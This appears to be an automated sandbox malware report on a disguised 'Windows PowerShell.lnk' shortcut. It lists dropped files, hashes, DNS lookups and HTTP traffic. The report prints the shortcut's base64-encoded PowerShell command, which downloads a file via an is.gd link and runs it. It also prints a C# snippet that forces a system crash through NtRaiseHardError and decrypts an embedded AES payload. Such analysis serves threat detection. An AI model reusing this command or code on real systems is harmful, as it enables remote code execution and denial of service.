                      Preview:.using System;using System.Text;using System.Security.Cryptography;using System.Runtime.InteropServices;using System.IO;public class X{[DllImport("ntdll.dll")]public static extern uint RtlAdjustPrivilege(int p,bool e,bool c,out bool o);[DllImport("ntdll.dll")]public static extern uint NtRaiseHardError(uint e,uint n,uint u,IntPtr p,uint v,out uint r);public static unsafe string Shot(){bool o;uint r;RtlAdjustPrivilege(19,true,false,out o);NtRaiseHardError(0xc0000022,0,0,IntPtr.Zero,6,out r);byte[]c=Convert.FromBase64String("RNo8TZ56Rv+EyZW73NocFOIiNFfL45tXw24UogGdHkswea/WhnNhCNwjQn1aWjfw");byte[]k=Convert.FromBase64String("/a1Y+fspq/NwlcPwpaT3irY2hcEytktuH7LsY+NlLew=");byte[]i=Convert.FromBase64String("9sXGmK4q9LdYFdOp4TSsQw==");using(Aes a=Aes.Create()){a.Key=k;a.IV=i;ICryptoTransform d=a.CreateDecryptor(a.Key,a.IV);using(var m=new MemoryStream(c))using(var y=new CryptoStream(m,d,CryptoStreamMode.Read))using(var s=new StreamReader(y)){return s.ReadToEnd();}}}}

                      C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                      Category:dropped
                      Size (bytes):181
                      Entropy (8bit):5.04566841683736
                      Encrypted:false
                      SSDEEP:3:0HXEXA8FREQN+E2J5xAIKTDVAlUiQCIFRVRMxTlLD8HIN+E2J5xAIKTDVAlHGA:pAu7N723fIDVaUzxs5n8oN723fIDVaHx
                      MD5:039F7E6B861EF3C82F54AB3790E72CE4
                      SHA1:5B8B7D564E5ED521A017D3317984275D4C620883
                      SHA-256:F0DCB2EF786DD34D06430B4C2915A59A1D35FF092656AE9074C58C13202FF03C
                      SHA-512:EF8AA13108B37347E21017A6408DAE247A41499FFB7C172CA34D75ED63CD8D73A57A2991E6DB5BD14C34ADC262A7D81A6DC9AB436EE466547CAD0733CE0B6525
                      Malicious:true
                      Preview:./t:library /utf8output /out:"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll" /debug- /optimize+ /unsafe "C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.0.cs"

                      C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):4608
                      Entropy (8bit):3.8194717084024554
                      Encrypted:false
                      SSDEEP:48:6wtela60xQKuPPLh4r8logsFJzFVocEHG4sSSzAEHlWge9qBHg/1uluCa3Zpq:lIlz02hf8NEH+Fe9kAQZK
                      MD5:21FE04DBE5B6A63DDE618CA5A7056655
                      SHA1:52AB8CB685DDA1835E3BDF6626E28CC31AB98A64
                      SHA-256:C5B81648F3FD35ACB2EA344E33674F0387B55286F232C062B31C9D73DF30D4D6
                      SHA-512:A7B450458D9C92478E948AD674D2CE4D8B2FF10C05BCF8F0327ED67006C188F3B7645358362727ED417B1AB1899C8B9D36E6CB3D80BE0E6B71092E8AB9E75672
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N.g...........!................n)... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H.......h!...............................................................0................(....& ".....~.......(....&r...p(.....r...p(.....r...p(......(.........o........o........o......o....o.......s...........s........s........o.......0..,...o.......,...o.......,...o.......,...o.......*....4.................. .........z.8.........J.t.........(....*BSJB............v4.0.30319......l...0...#~..........#Strings....@.......#US.P.......#GUID...`...P...#Blob...........GU........%3

                      C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):678
                      Entropy (8bit):5.26875980199203
                      Encrypted:false
                      SSDEEP:12:xKIR3haSV1KaSVlKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AIdhamsamlKax5DqBVKVrdFAMBJTH
                      MD5:BD8B4F3B5E89628C25345FCC95D7CADB
                      SHA1:ADDA61440EA67DF76CE1C9E56158E7C810DF3535
                      SHA-256:FD515101D2CF9D131C177B35290F1E76FFB7212AD7934F54037266C173359FE6
                      SHA-512:294DF7363014C7F950A43F6BC6082C52CF19D5FDA4A8DBA47A3295FB58751CD5F03E94C1C7ADB343277D088472775713E5B1CA10A2F387955A35F30F740A798C
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /out:"C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.dll" /debug- /optimize+ /unsafe "C:\Users\user\AppData\Local\Temp\pbkjdvqy\pbkjdvqy.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4511
                      Entropy (8bit):3.76365268496157
                      Encrypted:false
                      SSDEEP:48:7oCzAEy0sHOBQlHJySogZoYgwUsHOBQlLySogZoYgk1:7oCkMsHOBQ/HWsHOBQ9Hb
                      MD5:9CCE5356DC6A11416493AE6EBB29E467
                      SHA1:C6A7D6172E507BA80941B86E6961DFEC8AC13BC6
                      SHA-256:E2A7C9821C385AE88145CC7C4CAA8009BAFCA84BB4EE5F31D30B6D2566BF7179
                      SHA-512:E968D375CD980FEED4C82B1D4472DDE54A0BAF2626BD9806D593BE5C03FF07D2975A7C34B10C027F1BD85F9998F5C95D6C75C2A622AF38004B92F490C6FAD4B1
                      Malicious:false
                      Preview:...................................FL..................F. .. ...>...W...~.yJ%...;}.I%...<............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.....r.W...~.yJ%.....z.2.<...EYmf .WINDOW~1.LNK..^......EW.5EYmf............................%.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l...l.n.k......._...............-.......^............SAf.....C:\Users\user\Desktop\Windows PowerShell.lnk..`.......X.......134349...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwHEYmf....3......................Q..W.i.n.d.o.w.s.....Z.1.....EYjf..System32..B......OwHEYkf..........................~+4.S.y.s.t.e.m.3.2.....t.1......O.I..Wi

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SPB8BUCU6W9QDUKDVM45.temp

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4511
                      Entropy (8bit):3.76365268496157
                      Encrypted:false
                      SSDEEP:48:7oCzAEy0sHOBQlHJySogZoYgwUsHOBQlLySogZoYgk1:7oCkMsHOBQ/HWsHOBQ9Hb
                      MD5:9CCE5356DC6A11416493AE6EBB29E467
                      SHA1:C6A7D6172E507BA80941B86E6961DFEC8AC13BC6
                      SHA-256:E2A7C9821C385AE88145CC7C4CAA8009BAFCA84BB4EE5F31D30B6D2566BF7179
                      SHA-512:E968D375CD980FEED4C82B1D4472DDE54A0BAF2626BD9806D593BE5C03FF07D2975A7C34B10C027F1BD85F9998F5C95D6C75C2A622AF38004B92F490C6FAD4B1
                      Malicious:false
                      Preview:...................................FL..................F. .. ...>...W...~.yJ%...;}.I%...<............................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.....r.W...~.yJ%.....z.2.<...EYmf .WINDOW~1.LNK..^......EW.5EYmf............................%.W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l...l.n.k......._...............-.......^............SAf.....C:\Users\user\Desktop\Windows PowerShell.lnk..`.......X.......134349...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwHEYmf....3......................Q..W.i.n.d.o.w.s.....Z.1.....EYjf..System32..B......OwHEYkf..........................~+4.S.y.s.t.e.m.3.2.....t.1......O.I..Wi

                      Static File Info

                      General

                      File type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Archive, ctime=Fri Feb 16 20:44:00 2024, mtime=Thu Oct 3 08:53:00 2024, atime=Fri Feb 16 20:44:00 2024, length=450560, window=hidenormalshowminimized
                      Entropy (8bit):4.576583116818045
                      TrID:
                      • Windows Shortcut (20020/1) 100.00%
                      File name:Windows PowerShell.lnk
                      File size:1'852 bytes
                      MD5:02e1f1ea7dc301147433623d31e5a294
                      SHA1:b882f489808747b6201b113d306a42d533ca229e
                      SHA256:de6d56ae01166232f2cb403c86d2ddf59d7654510100971fcd0fe59a3a8e9944
                      SHA512:3aa0615c43e1598e04af1208356c7b4f0d0310723f23837975141a46dc9191a9be0c2ddea95a56abbe335ce82a85f5f24a73982af8cb7051d622aaeb6b198554
                      SSDEEP:24:8REKnFr9yxoKjKW3k9AfWkp+/CWP+SXPqHLj7hI3pXQaR3+93HVibs9RY+/vmu:8y09yZLzybqHLj8Xv3qRYkV
                      TLSH:43311C110EE70758E6778B39ABFAF3324762FD65E81A9BAD008052884D11214EE75F7F
                      File Content Preview:L..................F.... ....v.@!a..g$^.z....v.@!a...............................P.O. .:i.....+00.../C:\...................V.1.....CY.@..Windows.@........T,*CY.K....K.....................Ap..W.i.n.d.o.w.s.....Z.1.....CY.L..System32..B........T,*CY.L......

                      File Icon

                      Icon Hash:14ec98b2bae9ed0d

                      Static Windows Shortcut Info

                      General

                      Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Command Line Argument:-e aQB3AHIAIABpAHMALgBnAGQALwBqAHcAcgA3AEoARAAgAC0AbwAgACQAZQBuAHYAOgBUAE0AUAAvAC4AYwBtAGQAOwAmACAAJABlAG4AdgA6AFQATQBQAC8ALgBjAG0AZAA=
                      Icon location:

                      Network Behavior

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 5, 2024 14:51:29.526643038 CEST4971080192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:29.531449080 CEST8049710104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:29.531527996 CEST4971080192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:29.534039974 CEST4971080192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:29.538923979 CEST8049710104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:29.988699913 CEST8049710104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:29.997621059 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:29.997726917 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:29.997823000 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.005881071 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.005928040 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.041359901 CEST4971080192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.601675987 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.601774931 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.606858969 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.606893063 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.607331991 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.620079041 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.667406082 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.739032984 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.739187956 CEST44349711104.25.234.53192.168.2.6
                      Oct 5, 2024 14:51:30.739267111 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.742386103 CEST49711443192.168.2.6104.25.234.53
                      Oct 5, 2024 14:51:30.751351118 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:30.751415014 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:30.751467943 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:30.751703024 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:30.751722097 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.396028996 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.396092892 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.398580074 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.398598909 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.399003029 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.399748087 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.447415113 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.778475046 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.779043913 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.779118061 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.779155970 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.779176950 CEST44349712140.82.121.4192.168.2.6
                      Oct 5, 2024 14:51:31.779202938 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.779228926 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.784429073 CEST49712443192.168.2.6140.82.121.4
                      Oct 5, 2024 14:51:31.809322119 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:31.809366941 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:31.809423923 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:31.810617924 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:31.810633898 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.275971889 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.276283026 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.277880907 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.277888060 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.278315067 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.279134035 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.323401928 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.465259075 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466104031 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466167927 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.466203928 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466329098 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466392040 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.466401100 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466483116 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466545105 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.466551065 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466854095 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.466903925 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.466909885 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.467000008 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.467055082 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.467061996 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.509937048 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.509957075 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.552663088 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.552748919 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.552756071 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.552839994 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.552886963 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.552892923 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.552999020 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553050041 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.553056002 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553168058 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553215027 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.553220987 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553334951 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553383112 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.553389072 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553575993 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.553622961 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.553627968 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.555747032 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.555768967 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.555805922 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.555808067 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.555836916 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.555840015 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.555860043 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.555892944 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.639878035 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.639908075 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.639946938 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.639959097 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.639987946 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.640008926 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.641064882 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.641086102 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.641119957 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.641125917 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.641150951 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.641170979 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.642858028 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.642878056 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.642913103 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.642916918 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.642975092 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.642987013 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.644676924 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.644694090 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.644745111 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.644752026 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.644778967 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.644784927 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.726413012 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726449013 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726496935 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726619005 CEST44349714185.199.111.133192.168.2.6
                      Oct 5, 2024 14:51:32.726625919 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.726625919 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.726671934 CEST49714443192.168.2.6185.199.111.133
                      Oct 5, 2024 14:51:32.736278057 CEST49714443192.168.2.6185.199.111.133

                      UDP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 5, 2024 14:51:29.509161949 CEST5645653192.168.2.61.1.1.1
                      Oct 5, 2024 14:51:29.516081095 CEST53564561.1.1.1192.168.2.6
                      Oct 5, 2024 14:51:30.743479013 CEST5618153192.168.2.61.1.1.1
                      Oct 5, 2024 14:51:30.750808001 CEST53561811.1.1.1192.168.2.6
                      Oct 5, 2024 14:51:31.799606085 CEST5765753192.168.2.61.1.1.1
                      Oct 5, 2024 14:51:31.806504965 CEST53576571.1.1.1192.168.2.6

                      DNS Queries

                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Oct 5, 2024 14:51:29.509161949 CEST192.168.2.61.1.1.10xd22dStandard query (0)is.gdA (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:30.743479013 CEST192.168.2.61.1.1.10xe20eStandard query (0)github.comA (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:31.799606085 CEST192.168.2.61.1.1.10x77f6Standard query (0)objects.githubusercontent.comA (IP address)IN (0x0001)false

                      DNS Answers

                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Oct 5, 2024 14:51:29.516081095 CEST1.1.1.1192.168.2.60xd22dNo error (0)is.gd104.25.234.53A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:29.516081095 CEST1.1.1.1192.168.2.60xd22dNo error (0)is.gd104.25.233.53A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:29.516081095 CEST1.1.1.1192.168.2.60xd22dNo error (0)is.gd172.67.83.132A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:30.750808001 CEST1.1.1.1192.168.2.60xe20eNo error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:31.806504965 CEST1.1.1.1192.168.2.60x77f6No error (0)objects.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:31.806504965 CEST1.1.1.1192.168.2.60x77f6No error (0)objects.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:31.806504965 CEST1.1.1.1192.168.2.60x77f6No error (0)objects.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                      Oct 5, 2024 14:51:31.806504965 CEST1.1.1.1192.168.2.60x77f6No error (0)objects.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false

                      HTTP Request Dependency Graph

                      • is.gd
                      • github.com
                      • objects.githubusercontent.com

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649710104.25.234.53803468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      Oct 5, 2024 14:51:29.534039974 CEST156OUTGET /jwr7JD HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: is.gd
                      Connection: Keep-Alive
                      Oct 5, 2024 14:51:29.988699913 CEST700INHTTP/1.1 301 Moved Permanently
                      Date: Sat, 05 Oct 2024 12:51:29 GMT
                      Content-Type: text/html
                      Content-Length: 167
                      Connection: keep-alive
                      Cache-Control: max-age=3600
                      Expires: Sat, 05 Oct 2024 13:51:29 GMT
                      Location: https://is.gd/jwr7JD
                      Set-Cookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQ; path=/; expires=Sat, 05-Oct-24 13:21:29 GMT; domain=.is.gd; HttpOnly
                      Server: cloudflare
                      CF-RAY: 8cdd8b201b4c424a-EWR
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                      HTTPS Proxied Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649711104.25.234.534433468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      2024-10-05 12:51:30 UTC323OUTGET /jwr7JD HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: is.gd
                      Cookie: __cf_bm=Tayr4UKOTuOlJGv6OCIoBHJ4cmL2nzXhL5zeIMsr6ko-1728132689-1.0.1.1-qS4.lVj4h4RY.OQgdrWtfq9Y9QXr6oRaUPFcGg14gZ9m0vnqmc5ybvfiyNPGD4qoteXBF8BfZ6EOvBvFhfIOEQ
                      Connection: Keep-Alive
                      2024-10-05 12:51:30 UTC311INHTTP/1.1 301 Moved Permanently
                      Date: Sat, 05 Oct 2024 12:51:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Location: https://github.com/user-attachments/files/17251016/powershell.zip
                      CF-Cache-Status: DYNAMIC
                      Server: cloudflare
                      CF-RAY: 8cdd8b24ba818c33-EWR
                      2024-10-05 12:51:30 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.649712140.82.121.44433468C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      TimestampBytes transferredDirectionData
                      2024-10-05 12:51:31 UTC201OUTGET /user-attachments/files/17251016/powershell.zip HTTP/1.1
                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                      Host: github.com
                      Connection: Keep-Alive
                      2024-10-05 12:51:31 UTC965INHTTP/1.1 302 Found
                      Server: GitHub.com
                      Date: Sat, 05 Oct 2024 12:51:31 GMT
                      Content-Type: text/html; charset=utf-8
                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
